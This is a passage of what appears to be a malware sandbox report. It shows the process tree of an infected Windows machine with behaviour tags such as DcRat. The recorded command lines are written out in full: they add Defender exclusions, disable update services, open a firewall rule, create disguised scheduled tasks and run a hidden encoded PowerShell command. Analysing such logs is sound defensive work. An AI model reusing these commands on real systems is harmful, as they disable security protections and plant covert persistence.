            [7] C:\Windows\SysWOW64\cmd.exe
                cmd: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
              [8] C:\Windows\SysWOW64\cmd.exe
                  cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              [8] C:\Windows\SysWOW64\cacls.exe
                  cmd: CACLS "explothe.exe" /P "Admin:N"
              [8] C:\Windows\SysWOW64\cacls.exe
                  cmd: CACLS "explothe.exe" /P "Admin:R" /E
              [8] C:\Windows\SysWOW64\cmd.exe
                  cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              [8] C:\Windows\SysWOW64\cacls.exe
                  cmd: CACLS "..\fefffe8cea" /P "Admin:N"
              [8] C:\Windows\SysWOW64\cacls.exe
                  cmd: CACLS "..\fefffe8cea" /P "Admin:R" /E
            [7] C:\Windows\SysWOW64\rundll32.exe
                cmd: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                - Loads dropped DLL
      [4] C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Kg3IZ2.exe
          - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7HZ9qx58.exe
        - Executes dropped EXE
      [4] C:\Windows\System32\cmd.exe
          cmd: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BFD.tmp\2BFE.tmp\2BFF.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7HZ9qx58.exe"
          - Checks computer location settings
  [2] C:\Users\Admin\AppData\Local\Temp\85F4.exe
      - Executes dropped EXE
      - Adds Run key to start application
    [3] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\PA3Ij9az.exe
        - Executes dropped EXE
        - Adds Run key to start application
      [4] C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\yb9ls3GZ.exe
          - Executes dropped EXE
          - Adds Run key to start application
        [5] C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ye0fC7ZR.exe
            - Executes dropped EXE
            - Adds Run key to start application
          [6] C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\SJ3EA0VH.exe
              - Executes dropped EXE
              - Adds Run key to start application
            [7] C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1Xf60zx0.exe
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
              [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              [8] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                [9] C:\Windows\SysWOW64\WerFault.exe
                    cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 580
                    - Program crash
            [7] C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\2fr169sf.exe
                - Executes dropped EXE
  [2] C:\Users\Admin\AppData\Local\Temp\8AB8.exe
      - Executes dropped EXE
  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8BF1.bat" "
      - Checks computer location settings
  [2] C:\Users\Admin\AppData\Local\Temp\8D1B.exe
      - Executes dropped EXE
  [2] C:\Users\Admin\AppData\Local\Temp\8EC2.exe
      - Modifies Windows Defender Real-time Protection settings
      - Executes dropped EXE
      - Windows security modification
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\91EF.exe
      - Executes dropped EXE
  [2] C:\Users\Admin\AppData\Local\Temp\4449.exe
      - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
      [4] C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
          - Executes dropped EXE
          - Checks SCSI registry key(s)
          - Suspicious behavior: MapViewOfSection
    [3] C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
        - Executes dropped EXE
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: powershell -nologo -noprofile
      [4] C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
          - Windows security bypass
          - Executes dropped EXE
          - Windows security modification
          - Adds Run key to start application
          - Checks for VirtualBox DLLs, possible anti-VM trick
          - Drops file in Windows directory
          - Modifies data under HKEY_USERS
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
        [5] C:\Windows\System32\cmd.exe
            cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          [6] C:\Windows\system32\netsh.exe
              cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              - Modifies Windows Firewall
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
        [5] C:\Windows\rss\csrss.exe
            - Executes dropped EXE
            - Adds Run key to start application
            - Manipulates WinMonFS driver.
            - Drops file in Windows directory
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - DcRat
              - Creates scheduled task(s)
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmd: schtasks /delete /tn ScheduledUpdate /f
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
          [6] C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              cmd: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
              - Executes dropped EXE
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - DcRat
              - Creates scheduled task(s)
          [6] C:\Windows\windefender.exe
              cmd: "C:\Windows\windefender.exe"
              - Executes dropped EXE
            [7] C:\Windows\SysWOW64\cmd.exe
                cmd: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
              [8] C:\Windows\SysWOW64\sc.exe
                  cmd: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                  - Launches sc.exe
          [6] C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
              - Executes dropped EXE
            [7] C:\Windows\SYSTEM32\schtasks.exe
                cmd: schtasks /delete /tn "csrss" /f
            [7] C:\Windows\SYSTEM32\schtasks.exe
                cmd: schtasks /delete /tn "ScheduledUpdate" /f
    [3] C:\Users\Admin\AppData\Local\Temp\setup.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        - Executes dropped EXE
      [4] C:\Users\Admin\AppData\Local\Temp\7zS4CED.tmp\Install.exe
          cmd: .\Install.exe
          - Executes dropped EXE
        [5] C:\Users\Admin\AppData\Local\Temp\7zS4E74.tmp\Install.exe
            cmd: .\Install.exe /MKdidA "385119" /S
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Drops file in System32 directory
            - Enumerates system info in registry
          [6] C:\Windows\SysWOW64\forfiles.exe
              cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
            [7] C:\Windows\SysWOW64\cmd.exe
                cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
              [8] \??\c:\windows\SysWOW64\reg.exe
                  cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              [8] \??\c:\windows\SysWOW64\reg.exe
                  cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
          [6] C:\Windows\SysWOW64\forfiles.exe
              cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
            [7] C:\Windows\SysWOW64\cmd.exe
                cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
              [8] \??\c:\windows\SysWOW64\reg.exe
                  cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              [8] \??\c:\windows\SysWOW64\reg.exe
                  cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
          [6] C:\Windows\SysWOW64\schtasks.exe
              cmd: schtasks /CREATE /TN "gBWIJtiSe" /SC once /ST 04:01:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
              - DcRat
              - Creates scheduled task(s)
          [6] C:\Windows\SysWOW64\schtasks.exe
              cmd: schtasks /run /I /tn "gBWIJtiSe"
          [6] C:\Windows\SysWOW64\schtasks.exe
              cmd: schtasks /DELETE /F /TN "gBWIJtiSe"
          [6] C:\Windows\SysWOW64\schtasks.exe
              cmd: schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 23:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\tJYzbog.exe\" 3Y /tIsite_idILE 385119 /S" /V1 /F
              - DcRat
              - Drops file in Windows directory
              - Creates scheduled task(s)
    [3] C:\Users\Admin\AppData\Local\Temp\kos2.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\kos2.exe"
        - Executes dropped EXE
      [4] C:\Users\Admin\AppData\Local\Temp\set16.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\set16.exe"
          - Executes dropped EXE
        [5] C:\Users\Admin\AppData\Local\Temp\is-7OJRC.tmp\is-OVUC4.tmp
            cmd: "C:\Users\Admin\AppData\Local\Temp\is-7OJRC.tmp\is-OVUC4.tmp" /SL4 $F030A "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in Program Files directory
          [6] C:\Program Files (x86)\MyBurn\MyBurn.exe
              cmd: "C:\Program Files (x86)\MyBurn\MyBurn.exe" -i
              - Executes dropped EXE
          [6] C:\Windows\SysWOW64\net.exe
              cmd: "C:\Windows\system32\net.exe" helpmsg 20
            [7] C:\Windows\SysWOW64\net1.exe
                cmd: C:\Windows\system32\net1 helpmsg 20
          [6] C:\Program Files (x86)\MyBurn\MyBurn.exe
              cmd: "C:\Program Files (x86)\MyBurn\MyBurn.exe" -s
              - Executes dropped EXE
          [6] C:\Windows\SysWOW64\schtasks.exe
              cmd: "C:\Windows\system32\schtasks.exe" /Query
      [4] C:\Users\Admin\AppData\Local\Temp\K.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\K.exe"
          - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\latestX.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Drops file in Program Files directory
  [2] C:\Users\Admin\AppData\Local\Temp\4822.exe
      - Executes dropped EXE
      - Adds Run key to start application
  [2] C:\Users\Admin\AppData\Local\Temp\515A.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in Windows directory
    [3] C:\Windows\SysWOW64\WerFault.exe
        cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 760
        - Program crash
  [2] C:\Users\Admin\AppData\Local\Temp\8D0D.exe
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
    [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
        cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
      [4] C:\Windows\SysWOW64\WerFault.exe
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 388
          - Program crash
  [2] C:\Users\Admin\AppData\Local\Temp\AB44.exe
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  [2] C:\Windows\System32\cmd.exe
      cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    [3] C:\Windows\System32\sc.exe
        cmd: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe
        cmd: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe
        cmd: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe
        cmd: sc stop dosvc
        - Launches sc.exe
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    [3] C:\Windows\System32\Conhost.exe
        cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  [2] C:\Windows\System32\cmd.exe
      cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe
        cmd: powercfg /x -hibernate-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe
        cmd: powercfg /x -hibernate-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe
        cmd: powercfg /x -standby-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe
        cmd: powercfg /x -standby-timeout-dc 0
  [2] C:\Windows\System32\schtasks.exe
      cmd: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
  [2] C:\Windows\System32\cmd.exe
      cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    [3] C:\Windows\System32\sc.exe
        cmd: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe
        cmd: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe
        cmd: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe
        cmd: sc stop dosvc
        - Launches sc.exe
  [2] C:\Windows\System32\cmd.exe
      cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe
        cmd: powercfg /x -hibernate-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe
        cmd: powercfg /x -hibernate-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe
        cmd: powercfg /x -standby-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe
        cmd: powercfg /x -standby-timeout-dc 0
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  [2] C:\Windows\System32\conhost.exe
  [2] C:\Windows\explorer.exe
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[1] C:\Windows\system32\browser_broker.exe
    cmd: C:\Windows\system32\browser_broker.exe -Embedding
    - Modifies Internet Explorer settings
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of SetWindowsHookEx
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies registry class
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies registry class
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies registry class
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies registry class
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies registry class
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies registry class
[1] C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies registry class
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies registry class
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies registry class
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies registry class
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    cmd: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
[1] C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
    - Executes dropped EXE
[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  [2] C:\Windows\system32\gpupdate.exe
      cmd: "C:\Windows\system32\gpupdate.exe" /force
[1] C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
[1] \??\c:\windows\system32\svchost.exe
    cmd: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
[1] C:\Windows\system32\gpscript.exe
    cmd: gpscript.exe /RefreshSystemParam
[1] C:\Program Files\Google\Chrome\updater.exe
    cmd: "C:\Program Files\Google\Chrome\updater.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
[1] C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\tJYzbog.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\tJYzbog.exe 3Y /tIsite_idILE 385119 /S
    - Executes dropped EXE
  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
